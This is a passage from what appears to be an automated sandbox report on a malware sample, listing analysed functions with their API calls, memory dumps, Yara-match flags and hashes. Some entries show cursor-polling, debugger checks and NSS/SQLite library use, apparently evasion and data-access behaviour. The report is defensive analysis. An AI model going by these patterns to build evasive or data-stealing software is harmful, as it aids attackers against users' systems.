                                                                                                                                                                                                                • Part of subcall function 6CA49EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA5C6FD,?,?,?,?,6CAAF965,00000000), ref: 6CA49F0E
                                                                                                                                                                                                                • Part of subcall function 6CA49EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CAAF965,00000000), ref: 6CA49F5D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3155957115-0
                                                                                                                                                                                                              • Opcode ID: 5dc37020ed81062724b40b1eabc4d3d4eb8c73eae79dc274016d781a7e74e262
                                                                                                                                                                                                              • Instruction ID: 8d500edd57f7df3b751679343c5c223499a95b715bd84be4842ec0d0f7039d94
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dc37020ed81062724b40b1eabc4d3d4eb8c73eae79dc274016d781a7e74e262
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3391E1B0B002058FDB04CF29D985A7BB7B2FF45309F58862DE41697A50EB35E8E5CB61
                                                                                                                                                                                                              Function 6CB2BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB2BD48
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB2BD68
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB2BD83
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB2BD9E
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CB2BDB9
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CB2BDD0
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CB2BDEA
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CB2BE04
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CB2BE1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AlgorithmPolicy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2721248240-0
                                                                                                                                                                                                              • Opcode ID: 839fdd2040ced57d35896766ef532a367defeddbe809b3a74a1e28ff977af18c
                                                                                                                                                                                                              • Instruction ID: 61e34e680d659582a78cac4780d470d317d2cef842c55a8d44b143641a2090c8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 839fdd2040ced57d35896766ef532a367defeddbe809b3a74a1e28ff977af18c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE217377E042D957FB00565AAC43BBF3274DB9174DF080518EA1FEE641EB18941887A7
                                                                                                                                                                                                              Function 6CBD8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CC214E4,6CB8CC70), ref: 6CBD8D47
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD8D98
                                                                                                                                                                                                                • Part of subcall function 6CAB0F00: PR_GetPageSize.NSS3(6CAB0936,FFFFE8AE,?,6CA416B7,00000000,?,6CAB0936,00000000,?,6CA4204A), ref: 6CAB0F1B
                                                                                                                                                                                                                • Part of subcall function 6CAB0F00: PR_NewLogModule.NSS3(clock,6CAB0936,FFFFE8AE,?,6CA416B7,00000000,?,6CAB0936,00000000,?,6CA4204A), ref: 6CAB0F25
                                                                                                                                                                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CBD8E7B
                                                                                                                                                                                                              • htons.WSOCK32(?), ref: 6CBD8EDB
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD8F99
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD910A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                              • String ID: %u.%u.%u.%u
                                                                                                                                                                                                              • API String ID: 1845059423-1542503432
                                                                                                                                                                                                              • Opcode ID: 3c52b4ef0cedde38d5339d6fb02d334f44a84aae923ad00cc858a28fafbc21ec
                                                                                                                                                                                                              • Instruction ID: 52122ad530311ff2c6148f75e5da86803248930c9ac801cf14760991eee2c1a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c52b4ef0cedde38d5339d6fb02d334f44a84aae923ad00cc858a28fafbc21ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8602AC31D052D18FDB188F19C46576ABBB2EF42304F1B826AC8955BB91C732F949C7D2
                                                                                                                                                                                                              Function 0092180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00921823
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 0092182A
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0092183A
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0092184A
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00921859
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 0092186B
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00921870
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0092187F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3283940658-0
                                                                                                                                                                                                              • Opcode ID: e8595c9f767ad2d7b07dc596503429127712274ce39a6df7a73025af0718cd83
                                                                                                                                                                                                              • Instruction ID: db0e9f5b143b12dc295800e78b7c318f21d0cf1fe4731c4aafcdfb00d0b4481b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8595c9f767ad2d7b07dc596503429127712274ce39a6df7a73025af0718cd83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD115132E14219EBDB10DBE4EDC9BAE77BDEF54301F240865D501A2084DB74DA51DB60
                                                                                                                                                                                                              Function 6CB79C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,6CA4C52B), ref: 6CB79D53
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB7A035
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB7A114
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 717804543-598938438
                                                                                                                                                                                                              • Opcode ID: 7a3a578804a621ebac2fd4a7abe2d4793c64b5eb3fc40da35d89d516f5289263
                                                                                                                                                                                                              • Instruction ID: bfe731b80e344c4498bfc1115366bd176d49dfe67e7ddf1f3a6703b55dcdbd39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a3a578804a621ebac2fd4a7abe2d4793c64b5eb3fc40da35d89d516f5289263
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C122B171A0C3818FC764CF29C49061AB7E1FFCA344F148A2DE9EA97A41D735E945CB62
                                                                                                                                                                                                              Function 6CB99D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CA58637,?,?), ref: 6CB99E88
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CA58637), ref: 6CB99ED6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CB99ECA
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB99EC0
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB99ECF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 912837312-598938438
                                                                                                                                                                                                              • Opcode ID: 169e4e55935a81adfcd973e6f65265289df932ee3f7b315d80674ce019b797d9
                                                                                                                                                                                                              • Instruction ID: cbdb9c84c527a41c666549838f4058ef4b35c558ed1bb1bf3e5d183ed979cd54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 169e4e55935a81adfcd973e6f65265289df932ee3f7b315d80674ce019b797d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C981B231F016558FDB04CF6AC980ADEB3F6EF4A304B148129E91AABB51E730ED49CB51
                                                                                                                                                                                                              Function 0094B25C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B29B
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B2C4
                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0094B8C5,?,00948676,?,000000BC,?), ref: 0094B2D8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                              • Opcode ID: 836bb61fb67c53d8311d35602d9cf1a34019f374c7447a1118ea06b737de7cd3
                                                                                                                                                                                                              • Instruction ID: 0977339eb6e341fad7ec2cede6bcb35c8d27c22d4fd24f40f17469623e380c8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 836bb61fb67c53d8311d35602d9cf1a34019f374c7447a1118ea06b737de7cd3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701F231A0AB07BAEB21DB61EC56F5E73ECAF9635AF200014F901E10C1EBA0CF41A751
                                                                                                                                                                                                              Function 0093D1A8 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0093D5E0
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0093D5F5
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0095332C), ref: 0093D600
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0093D61C
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0093D623
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              • Opcode ID: 4937f5a9612db70b3c4f8c19c6cd5973b240f46871674249db78d51b3d175d85
                                                                                                                                                                                                              • Instruction ID: 40159137232d863713f4ce0fb6ab6eea86ce00731dbe9b0d6b3117b77ff507d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4937f5a9612db70b3c4f8c19c6cd5973b240f46871674249db78d51b3d175d85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB21DFB682A300DFD710DF26F844A487BB5FB48301F10901AE50C973A0E7B199C6AF96
                                                                                                                                                                                                              Function 6CBDCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBDD086
                                                                                                                                                                                                              • PR_Malloc.NSS3(00000001), ref: 6CBDD0B9
                                                                                                                                                                                                              • PR_Free.NSS3(?), ref: 6CBDD138
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeMallocstrlen
                                                                                                                                                                                                              • String ID: >
                                                                                                                                                                                                              • API String ID: 1782319670-325317158
                                                                                                                                                                                                              • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                              • Instruction ID: 5431bd379449932b4a5c729b605c41519904ca78868d1c4860a9000a1a830d28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5D17D62B815C70BEB14487C9CB13EA7797C782374F5A0325D1A18BBE5E619F847C722
                                                                                                                                                                                                              Function 6CB7AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 24c794f24696f78d7ed7bebb262df29e741b6bb6fcf5e06adf98a42f5b8c285b
                                                                                                                                                                                                              • Instruction ID: 153eb9211cc5e53af34ed9646c5aa1df30eb855fcde7f91b428705570edadf6b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24c794f24696f78d7ed7bebb262df29e741b6bb6fcf5e06adf98a42f5b8c285b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F19A71E011968FEB14CF2AC9457AA77B0BB8A308F15422DD915E7F40EB749982CF91
                                                                                                                                                                                                              Function 00931E32 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00B7E708,?,?,?,009328E1,?,?,00000000), ref: 00931E52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,009328E1,?,?,00000000), ref: 00931E5F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,009328E1,?,?,00000000), ref: 00931E66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1871034439-0
                                                                                                                                                                                                              • Opcode ID: 9f835f54147bcaf7c0c5986e20db56fe5bb86786a5609c3d2f9d1aba58888d5b
